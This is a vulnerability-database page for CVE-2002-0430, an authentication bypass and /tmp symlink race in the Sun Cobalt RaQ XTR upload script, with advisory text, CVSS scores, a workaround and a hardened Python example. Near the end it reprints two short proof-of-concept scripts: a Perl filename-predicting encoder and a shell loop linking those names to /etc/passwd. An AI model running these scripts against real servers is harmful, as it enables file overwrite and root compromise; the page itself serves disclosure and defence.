CVE-2002-0430
CVSS 3.7
Published: 2002-08-12 00:00:00
Last revised: 2008-09-10 15:12:01

[Original] MultiFileUploadHandler.php in the Sun Cobalt RaQ XTR administration interface allows local users to bypass authentication and overwrite arbitrary files via a symlink attack on a temporary file, followed by a request to MultiFileUpload.php.


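[CNNVD] Cobalt RaQ XTR MultiFileUpload.php authentication bypass vulnerability (CNNVD-200208-182)

        Cobalt RaQ is an Internet-based server program released and maintained by Sun Microsystems.
        The access settings of the "MultiFileUpload.php" file in Cobalt RaQ are flawed. A remote attacker can exploit this vulnerability to upload arbitrary files to the server, and a local user may exploit it to gain root privileges on the host.
        Other Cobalt RaQ administration scripts are protected by an HTTP authentication password, but the "MultiFileUpload.php" script is not, so a remote attacker can use it without any authentication to upload files as any user. Worse, uploaded files are stored under /tmp with predictable filenames. An attacker with local user access can create a symbolic link in /tmp that points to the file to be overwritten and then upload a file through the "MultiFileUpload.php" script, which overwrites the system file and yields root privileges on the host. At a minimum, a remote attacker can exploit this vulnerability to consume the host's disk space, causing a denial of service.
        An attacker can reach the PHP program through a link similar to the following:
        https://:81/uifc/MultFileUploadHandler.php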
        

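- CVSS (base score)

CVSS score: 3.7 [Minor (LOW)]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]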

- CPE (affected platforms and products)

cpe:/h:sun:cobalt_raq_4     Sun Cobalt RaQ 4.0
cpe:/h:sun:cobalt_raq_3i    Sun Cobalt RaQ 3.0
cpe:/h:sun:cobalt_raq_2     Sun Cobalt RaQ 2.0

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0430
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0430
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-182
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/4252
(UNKNOWN)  BID  4252
http://archives.neohapsis.com/archives/bugtraq/2002-03/0081.html
(VENDOR_ADVISORY)  BUGTRAQ  20020308 Remote Cobalt Raq XTR vulns

- Vulnerability information

Cobalt RaQ XTR MultiFileUpload.php authentication bypass vulnerability
Low risk  Input validation
2002-08-12 00:00:00 2006-08-28 00:00:00
Remote
        
        

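- Advisories and patches

        Workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * If the MultiFileUpload.php script is not needed, remove its execute permission or delete it. If it is needed, configure proper HTTP access authentication.
        Vendor patch:
        Sun
        ---
        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

        http://www.sun.com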
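
The overwrite in this record depends on the upload handler opening a guessable name in /tmp. The following is an added example, not Sun's code and not taken from the advisories: a guessable-name write beside two hardened forms, run in a scratch directory. The base64-of-time naming is an assumption drawn from the encoder script on this page, and the file names and timestamp are constructed.

```python
import base64, os, tempfile
from pathlib import Path

def predictable_name(now):
    # Assumed scheme: base64 of the Unix time, as the encoder script on this page emits.
    return base64.b64encode(str(now).encode()).decode()

def naive_store(tmpdir, now, data):
    # "Before": a guessable path; open() follows a link that was placed there first.
    path = os.path.join(tmpdir, predictable_name(now))
    with open(path, "wb") as fh:
        fh.write(data)

def exclusive_store(path, data):
    # Fixed name, hardened: O_EXCL fails if anything (a symlink included) already exists.
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    with os.fdopen(os.open(path, flags, 0o600), "wb") as fh:
        fh.write(data)

def safe_store(tmpdir, data):
    # Preferred: mkstemp picks a random name and creates it exclusively, mode 0600.
    fd, path = tempfile.mkstemp(prefix="upload-", dir=tmpdir)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path

def demo():
    box = Path(tempfile.mkdtemp())              # constructed stand-in for /tmp
    victim = box / "victim.conf"                # constructed stand-in for a system file
    victim.write_bytes(b"original\n")
    now = 1015545600                            # constructed timestamp
    link = box / predictable_name(now)
    link.symlink_to(victim)                     # link already present when the upload arrives

    naive_store(box, now, b"upload\n")
    clobbered = victim.read_bytes() == b"upload\n"   # the write landed on the link target

    victim.write_bytes(b"original\n")           # reset the victim, link still in place
    try:
        exclusive_store(link, b"upload\n")
        refused = False
    except FileExistsError:
        refused = True
    stored = safe_store(box, b"upload\n")
    return clobbered, refused, victim.read_bytes() == b"original\n", os.path.basename(stored)

if __name__ == "__main__":
    print(demo())
```

Keeping upload spool files in a directory that only the web server account can write to removes the shared-/tmp precondition altogether.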

- Vulnerability information (21334)

Cobalt RaQ 2.0/3.0/4.0 XTR MultiFileUpload.php Authentication Bypass Vulnerability (1) (EDBID:21334)
php remote
2002-03-08 Verified
0 Wouter ter Maat
N/A
source: http://www.securityfocus.com/bid/4252/info

Cobalt RaQ is a server appliance for Internet-based services. It is distributed and maintained by Sun Microsystems.

The 'MultiFileUpload.php' script is not sufficiently protected from outside access. While other sensitive administrative scripts are protected with HTTP authentication, 'MultiFileUpload.php' is not. Remote clients may invoke the execution of this script without valid administrator credentials.

In doing so, it is possible for an attacker to upload files that are created on the server filesystem as any user.

Furthermore, the uploaded files are stored in '/tmp' with predictable filenames. If the attacker has local access to the system, this vulnerability can be exploited to overwrite a file of equal user and group ownership through the use of a symbolic link.

Successful exploitation of this vulnerability by an attacker with local access may result in a compromise of root privileges. Attackers without local access may be able to cause a denial of service through consumption of disk space.

#!/usr/bin/perl
# mass base64 time encoder
# part of Cobalt UIFC XTR remote/local combination attack


use MIME::Base64;
$evil_time = time();

$exploit_secs = 10; # time in seconds you got to exploit this bug (race)

for($i=1;$i<=$exploit_secs; $i++) {
      $evil_time = $evil_time+1;
      $evilstr = encode_base64($evil_time);
      print $evilstr;
}
		

- Vulnerability information (21335)

Cobalt RaQ 2.0/3.0/4.0 XTR MultiFileUpload.php Authentication Bypass Vulnerability (2) (EDBID:21335)
php remote
2002-03-08 Verified
0 Wouter ter Maat
N/A
source: http://www.securityfocus.com/bid/4252/info
 

#!/bin/sh
#Script for creating symlinks from output of local-timerace-xtr

for foo in `perl -x xtr-timerace-xtr.pl`
do
ln -s /etc/passwd $foo
done		

- Vulnerability information

13161
Sun Cobalt RaQ XTR MultiFileUploadHandler.php Arbitrary File Overwrite
Remote / Network Access

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-03-02 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Cobalt RaQ XTR MultiFileUpload.php Authentication Bypass Vulnerability
Input Validation Error 4252
Yes No
2002-03-08 12:00:00 2009-07-11 10:56:00
Vulnerability discovered credit to Wouter ter Maat <grazer@digit-labs.org>.

- Affected software versions

Cobalt RaQ 4.0
Cobalt RaQ 3.0
Cobalt RaQ 2.0

- Exploit

Exploits contributed by W. ter Maat - Digit-Labs Information Security <termaat@gelrevision.nl>.

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

 

 
